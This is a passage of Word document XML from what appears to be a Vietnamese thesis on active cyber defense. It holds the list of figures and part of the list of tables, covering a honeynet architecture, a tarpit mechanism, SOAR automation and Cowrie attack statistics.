          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">26</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hình 3.4</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Giao diện Thẻ cảnh báo và Bàn phím tương tác Inline Buttons của Telegram SOAR Bot</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">29</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7A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hình 3.5</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sơ đồ Kiến trúc Mạng Bẫy Mồi Phân tán (Distributed Honeynet Cluster Architecture)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">31</w:t>
            </w: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rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hình 5.1</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Đo lường Hiệu quả Làm chậm &amp; Triệt tiêu Tấn công của Cơ chế Tarpit</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">34</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80">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hình 5.2</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">So sánh Thời gian Phản ứng Sự cố: Quy trình Thủ công vs Tự động hóa SOAR</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">36</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hình 5.3</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Biểu đồ phân bố Kỹ thuật Tấn công ghi nhận trên Cowrie (Chuẩn MITRE ATT&amp;CK)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">38</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">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87">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:spacing w:before="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="00336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88">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DANH MỤC BẢNG BIỂU DỮ LIỆU</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">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0.3: Danh mục bảng biểu dữ liệu</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>
        <w:tblW w:w="94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4"/>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3134"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3134"/>
            <w:gridCol w:w="3134"/>
            <w:gridCol w:w="3134"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ký hiệu</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tên bảng dữ liệu</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Trang</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bảng 0.1</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bảng giải nghĩa các thuật ngữ viết tắt trong đồ án</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5</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90">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bảng 0.2</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Danh mục các hình vẽ và biểu đồ trong đồ án</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="2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rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bảng 0.3</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Danh mục bảng biểu dữ liệu</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">7</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96">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bảng 1.1</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">So sánh sự khác biệt giữa Triển khai Ứng dụng Bề nổi và Hệ thống Active Defense</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
